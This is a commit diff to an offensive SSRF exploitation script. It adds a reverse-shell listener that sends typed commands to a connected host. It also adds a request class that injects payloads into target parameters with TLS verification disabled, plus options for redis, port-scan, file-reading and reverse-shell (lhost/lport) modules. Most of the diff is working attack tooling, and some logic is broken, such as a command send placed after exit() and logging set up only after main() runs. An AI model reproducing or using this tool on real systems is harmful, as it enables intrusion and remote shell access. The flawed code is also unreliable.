Update ssrf-exploition.py

Author: errorfiathck

ssrf-exploition.py

@@ -1,11 +1,17 @@
 from banner.banner import banner
+import urllib.parse
+import urllib3
 import regex
 import argparse
 import requests
 import time
 import os
 import threading
 import random
+import logging
+import re
+import json
+import socket
 
 execPath = os.getcwd()
 currentPath = os.path.dirname(__file__)
@@ -16,13 +22,32 @@
 LOCK = threading.Lock()
 
 banner()
-parser = argparse.ArgumentParser()
+
+example_text = '''Example: 
+python3 ssrf-exploit.py -u https://example.com/
+python3 ssrf-exploit.py -u https://example.com/ -m redis
+python3 ssrf-exploit.py -u https://example.com/ -m portscan
+python3 ssrf-exploit.py -u https://example.com/ -m readfiles --rfile
+python3 ssrf-exploit.py -u https://example.com/ -m portscan --ssl --uagent "SSRFexploitAgent"
+python3 ssrf-exploit.py -u https://example.com/ -m redis --lhost=127.0.0.1 --lport=8080 -l 8080
+
+'''
+parser = argparse.ArgumentParser(epilog=example_text, formatter_class=argparse.RawDescriptionHelpFormatter)
 parser.add_argument("--file", "-f", type=str, required=False, help= 'file of all URLs to be tested against SSRF')
 parser.add_argument("--url", "-u", type=str, required=False, help= 'url to be tested against SSRF')
 parser.add_argument("--threads", "-n", type=int, required=False, help= 'number of threads for the tool')
 parser.add_argument("--output", "-o", type=str, required=False, help='output file path')
+parser.add_argument("--moudle", "-m", action="store", dest="moudles", help="SSRF Moudles to enable")
+parser.add_argument("--handler", "-l", action="store", dest="handler", help="Start an handler for a reverse shell" )
 parser.add_argument("--oneshot", "-t", action='store_true', help='fuzz with only one basic payload - to be activated in case of time constraints')
-parser.add_argument("--verbose", "-v", action='store_true', help='activate verbose mode')
+parser.add_argument("--rfiles", "-r", action="store", dest="targetfiles", help="Files to read with readfiles moudle" )
+parser.add_argument("--verbose", "-v", action='store_true', help='activate verbose mode' )
+parser.add_argument("--lhost", action="store", dest="lhost", help="LHOST reverse shell")
+parser.add_argument("--lport", action="store", dest="lport", help="LPORT reverse shell")
+parser.add_argument("--ssl",   action ='store', dest='ssl', help="Use HTTPS without verification", )
+parser.add_argument("--proxy",   action ='store', dest='proxy', help="Use HTTP(s) proxy (ex: http://localhost:8080)")
+parser.add_argument("--level", action ='store', dest='level', help="Level of test to perform (1-5, default: 1)", default=1, type=int)
+parser.add_argument("--uagent", action="store", dest="useragent", help="useragent to use")
 
 
 args = parser.parse_args()
@@ -51,6 +76,201 @@
 
 extractInteractionServerURL = "(?<=] )([a-z0-9][a-z0-9][a-z0-9].*)"
 
+class Handler(threading.Thread):
+
+    def __init__(self, port):
+        threading.Thread.__init__(self)
+        logging.info(f"Handler listening on 0.0.0.0:{port}")
+        self.connected = False
+        self.port = int(port)
+
+    def run(self):
+        self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+        self.socket.bind(('', self.port))
+
+        while True:
+            self.socket.listen(5)
+            self.client, address = self.socket.accept()
+            print(f"Handler> New session from {address[0]}")
+            self.connected = True
+
+            response = self.client.recv(255)
+            while response != b"":
+                print(f"\n{response.decode('utf_8', 'ignore').strip()}\nShell > $ ", end='')
+                response = self.client.recv(255)
+
+    def listen_command(self):
+        if self.connected == True:
+            cmd = input("Shell> $ ")
+            if cmd == "exit":
+                self.kill()
+                print("BYE !")
+                exit()
+                self.send_command(cmd+"\n\n")
+
+    def send_command(self, cmd):
+        self.client.sendall(cmd.encode())
+
+    def kill(self):
+        self.client.close()
+        self.socket.close()
+
+
+class Requester(object):
+    protocol   = "http"
+    host       = ""
+    method     = ""
+    action     = ""
+    headers    = {}
+    data       = {}
+
+    def __init__(self, path, uagent, ssl, proxies):
+        try:
+            # Read file request
+            with open(path, 'r') as f:
+                content = f.read().strip()
+        except IOError as e:
+            logging.error("File not found")
+            exit()
+
+        try:
+            content = content.split('\n')
+            # Parse method and action URI
+            regex = re.compile('(.*) (.*) HTTP')
+            self.method, self.action = regex.findall(content[0])[0]
+
+            # Parse headers
+            for header in content[1:]:
+                name, _, value = header.partition(': ')
+                if not name or not value:
+                    continue
+                self.headers[name] = value
+            self.host = self.headers['Host']
+
+            # Parse user-agent        
+            if uagent != None:
+                self.headers['User-Agent'] = uagent
+            
+            # Parse data
+            self.data_to_dict(content[-1])
+
+            # Handling HTTPS requests
+            if ssl == True:
+                self.protocol   = "https"
+            
+            self.proxies = proxies
+
+        except Exception as e:
+            logging.warning("Bad Format or Raw data !")
+
+
+    def data_to_dict(self, data):
+        if self.method == "POST":
+
+            # Handle JSON data
+            if self.headers['Content-Type'] and "application/json" in self.headers['Content-Type']:
+                self.data = json.loads(data)
+
+            # Handle XML data
+            elif self.headers['Content-Type'] and "application/xml" in self.headers['Content-Type']:
+                self.data['__xml__'] = data
+
+            # Handle FORM data
+            else:
+                for arg in data.split("&"):
+                    regex = re.compile('(.*)=(.*)')
+                    for name,value in regex.findall(arg):
+                        name = urllib.parse.unquote(name)
+                        value = urllib.parse.unquote(value)
+                        self.data[name] = value
+
+
+    def do_request(self, param, value, timeout=3, stream=False):
+        try:
+            if self.method == "POST":
+                # Copying data to avoid multiple variables edit
+                data_injected = self.data.copy()
+
+                if param in str(data_injected): # Fix for issue/10 : str(data_injected)
+                    data_injected[param] = value
+            
+                    # Handle JSON data
+                    if self.headers['Content-Type'] and "application/json" in self.headers['Content-Type']:
+                        r = requests.post(
+                            self.protocol + "://" + self.host + self.action, 
+                            headers=self.headers, 
+                            json=data_injected,
+                            timeout=timeout,
+                            stream=stream,
+                            verify=False,
+                            proxies=self.proxies
+                        )
+
+                    # Handle FORM data
+                    else:
+                        if param == '': data_injected = value
+                        r = requests.post(
+                            self.protocol + "://" + self.host + self.action, 
+                            headers=self.headers, 
+                            data=data_injected,
+                            timeout=timeout,
+                            stream=stream,
+                            verify=False,
+                            proxies=self.proxies
+                        )
+                else:
+                    if self.headers['Content-Type'] and "application/xml" in self.headers['Content-Type']:
+                        if "*FUZZ*" in data_injected['__xml__']:
+
+                            # replace the injection point with the payload
+                            data_xml = data_injected['__xml__']
+                            data_xml = data_xml.replace('*FUZZ*', value)
+
+                            r = requests.post(
+                                self.protocol + "://" + self.host + self.action, 
+                                headers=self.headers, 
+                                data=data_xml,
+                                timeout=timeout,
+                                stream=stream,
+                                verify=False,
+                                proxies=self.proxies
+                            )                            
+                            
+                        else:
+                            logging.error("No injection point found ! (use -p)")
+                            exit(1)  
+                    else:
+                        logging.error("No injection point found ! (use -p)")
+                        exit(1)  
+            else:
+                # String is immutable, we don't have to do a "forced" copy
+                regex = re.compile(param+"=([^&]+)")
+                value = urllib.parse.quote(value, safe='')
+                data_injected = re.sub(regex, param+'='+value, self.action)
+                r = requests.get(
+                    self.protocol + "://" + self.host + data_injected, 
+                    headers=self.headers,
+                    timeout=timeout,
+                    stream=stream,
+                    verify=False,
+                    proxies=self.proxies
+                )
+        except Exception as e:
+            logging.error(e)
+            return None
+        return r
+
+    def __str__(self):
+        text =  self.method + " "
+        text += self.action + " HTTP/1.1\n"
+        for header in self.headers:
+            text += header + ": " + self.headers[header] + "\n"
+
+        text += "\n\n"
+        for data in self.data:
+            text += data + "=" + self.data[data] + "&"
+        return text[:-1]
+
 def getFileSize(fileID):
     interactionLogs = open(f"output/threadsLogs/interaction-logs{fileID}.txt", "r")
     return len(interactionLogs.read())
@@ -237,7 +457,21 @@ def main():
             for thread in workingThreads:
                 thread.join()
     outputFile.close()
+    
 
 
 if __name__ == '__main__':
-    main()
+    main()
+    urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
+
+    logging.basicConfig(
+        level=logging.INFO,
+        format="[%(levelname)s]:%(message)s",
+        handlers=[
+            logging.FileHandler("ssrf-exploit.log", mode='w'),
+            logging.StreamHandler()
+        ]
+    )
+
+    logging.addLevelName( logging.WARNING, "\033[1;31m%s\033[1;0m" % logging.getLevelName(logging.WARNING))
+    logging.addLevelName( logging.ERROR, "\033[1;41m%s\033[1;0m" % logging.getLevelName(logging.ERROR))